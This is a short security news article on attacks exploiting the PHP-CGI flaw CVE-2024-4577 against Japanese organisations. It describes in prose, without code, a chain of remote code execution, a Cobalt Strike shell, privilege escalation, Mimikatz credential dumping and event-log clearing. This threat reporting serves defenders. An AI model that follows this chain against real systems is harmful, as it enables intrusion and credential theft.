A recent cybersecurity threat has emerged where attackers are exploiting a critical remote code execution (RCE) vulnerability in PHP-CGI implementations on Windows, specifically targeting organizations in Japan.
The vulnerability, identified as CVE-2024-4577, allows attackers to execute arbitrary PHP code on vulnerable servers by leveraging the “Best-Fit” behavior in Windows code pages.
This flaw misinterprets certain characters in command-line inputs as PHP options, enabling malicious code execution when using Apache with a vulnerable PHP-CGI setup.
Exploitation and Post-Exploitation Activities
The attackers use a publicly available Python script, “PHP-CGI_CVE-2024-4577_RCE.py,” to exploit this vulnerability.
Once successful, they execute a PowerShell command embedded in the PHP code, which downloads and runs a PowerShell injector script from a command and control (C2) server.
This script injects and executes Cobalt Strike reverse HTTP shellcode, providing remote access to the compromised machine.
The attackers then conduct reconnaissance, gather system details, and escalate privileges using exploits like JuicyPotato, RottenPotato, and SweetPotato.
They establish persistence by modifying registry keys and creating scheduled tasks using plugins from the Cobalt Strike “TaoWu” kit.
The attackers also engage in lateral movement by using tools like “fscan.exe” for network scanning and “Seatbelt.exe” to gather system information.
They attempt to abuse Group Policy Objects (GPOs) to execute malicious scripts across the network.
Additionally, they use Mimikatz to dump and exfiltrate passwords and NTLM hashes from memory.
The attackers erase event logs to maintain stealth, employing the “wevtutil.exe” command to clear Windows security, system, and application logs.
Misuse of Legitimate Tools and Frameworks
The attackers have been observed misusing legitimate tools and frameworks hosted on an Alibaba cloud container registry.
A pre-configured installer script, “LinuxEnvConfig.sh,” is used to set up various offensive security frameworks, including Vulfocus, Asset Reconnaissance Lighthouse (ARL), Viper C2, Starkiller, BeEF, and Blue-Lotus.
According to Cisco Talos Report, these tools are packaged as Docker containers and can be used for malicious purposes such as cross-site scripting, browser exploitation, and remote command execution.
The attackers’ tactics show similarities with previous attacks by groups like “Dark Cloud Shield,” although attribution remains uncertain.
The exploitation of such vulnerabilities highlights the ongoing trend of threat actors targeting vulnerable public-facing applications for initial access.
 vulnerability.){kind=link}